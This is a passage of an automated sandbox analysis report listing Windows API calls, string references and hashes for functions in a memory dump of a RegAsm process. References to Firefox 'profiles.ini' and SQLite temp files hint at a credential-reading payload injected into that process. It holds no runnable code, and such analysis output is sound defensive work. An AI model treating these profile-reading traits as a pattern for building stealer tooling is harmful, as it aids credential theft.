                                                                                                                            • API String ID: 2080319088-3046471546
                                                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                            APIs
                                                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                            • memset.MSVCRT ref: 00413292
                                                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                                                            • memset.MSVCRT ref: 00413310
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                            Strings
                                                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                            • API String ID: 4111938811-1819279800
                                                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                            • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 829165378-0
                                                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00404172
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • memset.MSVCRT ref: 00404200
                                                                                                                            • memset.MSVCRT ref: 00404215
                                                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                            • API String ID: 2454223109-1580313836
                                                                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                            • API String ID: 2000436516-3842416460
                                                                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                            • memcmp.MSVCRT ref: 004092D9
                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                            • memcmp.MSVCRT ref: 0040933B
                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                            • memcmp.MSVCRT ref: 00409411
                                                                                                                            • memcmp.MSVCRT ref: 00409429
                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                            • memcmp.MSVCRT ref: 004094AC
                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3715365532-3916222277
                                                                                                                            • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                            • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1700100422-0
                                                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                            APIs
                                                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 552707033-0
                                                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                            APIs
                                                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                            • String ID: A
                                                                                                                            • API String ID: 2892645895-3554254475
                                                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                            • String ID: 4$h
                                                                                                                            • API String ID: 4019544885-1856150674
                                                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                            • String ID: strings
                                                                                                                            • API String ID: 3166385802-3030018805
                                                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                            APIs
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1331804452-0
                                                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • <%s>, xrefs: 004100A6
                                                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                            • API String ID: 3473751417-2880344631
                                                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                                                            • String ID: %2.2X
                                                                                                                            • API String ID: 2521778956-791839006
                                                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                            APIs
                                                                                                                            • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                            • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                            • free.MSVCRT ref: 0041822B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PathTemp$free
                                                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                                                            • API String ID: 924794160-1420421710
                                                                                                                            • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                            • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1471605966-0
                                                                                                                            • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
